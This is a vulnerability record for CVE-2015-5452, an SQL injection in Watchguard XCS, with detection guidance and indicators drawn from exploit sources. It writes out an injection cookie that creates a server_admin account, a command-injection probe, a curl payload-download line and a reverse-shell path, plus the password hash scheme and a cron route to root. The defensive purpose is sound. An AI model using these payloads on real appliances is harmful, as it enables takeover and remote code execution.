CVE-2015-5452
published 2015-07-08


Priority: P3 54
CVSS 2.0: 7.5 (high), vector AV:N/AC:L/Au:N/C:P/I:P/A:P
Exploit: available
EPSS: 3.42% (87.4th percentile)
SQL injection vulnerability in Watchguard XCS 9.2 and 10.0 before build 150522 allows remote attackers to execute arbitrary SQL commands via the sid cookie, as demonstrated by a request to borderpost/imp/compose.php3.

Affected (2 ranges)

Vendor: watchguard, Product: xcs
Vendor: watchguard, Product: xcs
(the version range and fixed-in columns are empty in this record)

Detection & IOCs (extracted from sources)

path: /borderpost/imp/compose.php3
cookie: sid=1'
cookie: sid=1%3BINSERT INTO sds_users (self, login, password, org, priv_level, quota, disk_usage) VALUES(#{user_id}, '#{username}', '#{pwd_hash}', 0, 'server_admin', 0, 0)--
path: /ADMIN/mailqueue.spl
path: /login.spl
command: /usr/local/sbin/curl -k #{payload_uri} -o /tmp/#(unknown)
path: /tmp/revshell
  • Detect SQLi exploitation attempts via the 'sid' cookie on /borderpost/imp/compose.php3 — look for SQL metacharacters (single quote, semicolon, INSERT, --) in the sid cookie value.
  • A vulnerable host will return the string 'unterminated quoted string' in the HTTP response body when probed with sid=1' — use this as a fingerprint for the check.
  • Detect command injection exploitation via GET requests to /ADMIN/mailqueue.spl with the 'id' parameter containing a leading semicolon (e.g., id=;id or id=;/usr/local/sbin/curl).
  • Successful command injection as 'nobody' (uid=65534) can be confirmed by the string 'uid=65534' appearing in the HTTP response body.
  • Monitor for outbound curl requests from the appliance to external hosts (curl -k) followed by chmod +x and execution of a binary dropped in /tmp — indicative of payload delivery stage.
  • Alert on INSERT SQL statements injected into the sid cookie targeting the sds_users table, particularly inserting a user with priv_level='server_admin'.
  • The XCS password hash uses a known salting scheme: MD5('BorderWare ' + password + ' some other random (9) stuff'), then MD5(password + first_hash). Detect or crack hashes using this scheme.
  • The exploit requires SSL (HTTPS on port 443) to communicate with the target appliance.
  • The Metasploit module targets a 64-bit BSD platform (ARCH_X86_64); payload must be a native BSD payload or generation will fail.
  • The command injection executes as the 'nobody' user (uid=65534), not root — privilege escalation is a separate step (e.g., via cron job running /tmp/revshell as root).
  • The fix is Build 150522; only Watchguard XCS versions 9.2 and 10.0 prior to this build are affected.